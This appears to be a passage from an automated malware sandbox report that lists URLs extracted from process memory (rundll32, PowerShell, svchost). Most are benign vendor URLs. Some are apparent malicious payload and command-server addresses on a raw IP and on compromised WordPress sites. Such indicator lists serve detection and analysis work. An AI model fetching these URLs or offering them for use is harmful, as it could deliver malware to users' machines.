Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp, rundll32.exe, 0000000E.00000003.411786554.0000000003271000.00000004.00000001.sdmp String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/?
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/llc
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/w
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://192.168.0.194/wp_011_lifestyle/wp-content/uploads/2017/03/2.jpg
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000004.00000003.278015248.0000018A2C0E9000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000004.00000003.212412335.0000018A123DE000.00000004.00000001.sdmp String found in binary or memory: http://crl.micr
Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp String found in binary or memory: http://d-cem.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://fonts.googleapis.com/css?family=Work
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://html5shim.googlecode.com/svn/trunk/html5.js
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.5.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.5
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.5.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/includes/demos/lifestyle/demo_style.css?ver=8.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style-woocommerce.css?ver=8.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style.css?ver=8.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/xmlrpc.php
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.comx
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: powershell.exe, 00000004.00000003.278161412.0000018A2C142000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/0#
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://rycomputer.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/WebPage
Source: svchost.exe, 00000008.00000002.471334775.000001607C850000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.281319093.0000018A14071000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/p/RuMeRPa/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/cc.main.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/jquery.dd.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/style.min.css?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/cargo/bt_elements.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3.2
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/css/jquery.datetimepicker.min.css?v
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/js/jquery.datetimepicker.full.min.j
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/fontawesome.min.css?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/main.min.css?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/wpcargo-style.css?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/js/wpcargo.js?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/gfx/plug.png);
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/dir.hover.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/fancySelect.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/header.misc.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/jquery.magnific-popup.min.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/misc.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/slick.min.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/sliders.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/style.css?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/js/wp-embed.min.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000004.00000002.289110750.0000018A1525D000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.comx
Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000011.00000002.308233755.000001E8C7413000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://anybunny.mobi/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.cortana.ai
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.office.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.onedrive.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://api.w.org/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://arabysexy.mobi/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://augloop.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cdn.entity.
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cortana.ai
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cortana.ai/api
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cr.office.com
Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp String found in binary or memory: https://d-cem.com
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: https://d-cem.com/wp-admin/JSLwG1/
Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp String found in binary or memory: https://d-cem.comx
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dev.cortana.ai
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000011.00000002.308266582.000001E8C7442000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000011.00000002.308266582.000001E8C7442000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://directory.services.
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://dirtyindianporn.info/
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000003.286166612.000001E8C7432000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C90
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://freejavporn.mobi/
Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://go-indian.pro/
Source: powershell.exe, 00000004.00000002.289836122.0000018A15796000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://graph.windows.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://graph.windows.net/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://hindiporn.pro/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://hotindianporn.mobi/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
